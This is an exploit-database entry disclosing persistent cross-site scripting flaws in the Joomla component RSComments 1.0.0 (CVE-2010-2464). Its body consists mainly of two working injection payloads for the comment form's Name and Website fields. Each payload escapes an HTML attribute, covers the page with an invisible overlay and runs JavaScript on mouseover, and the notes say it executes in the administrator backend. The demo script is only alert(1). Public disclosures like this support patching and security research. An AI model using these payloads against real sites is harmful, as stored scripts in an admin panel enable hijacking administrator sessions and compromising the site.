Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting

Author: jdc
type: webapps
platform: php
port: 
date_added: 2010-06-18  
date_updated: 2016-11-04  
verified: 1  
codes: OSVDB-65726;CVE-2010-2464  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 13935.txt  
# Exploit Title: Joomla Component RSComments 1.0.0 Multiple XSS
Vulnerabilities
# Date: 18 May 2010
# Author: jdc
# Software Link: http://www.rsjoomla.com
# Version: 1.0.0
# Tested on: PHP5, MySQL5

Name Field Persistent XSS
-------------------------

x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//"

NOTE: ONLY executes in backend!

Website Field Persistent XSS
----------------------------

http://x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//"

NOTE: also executes in backend!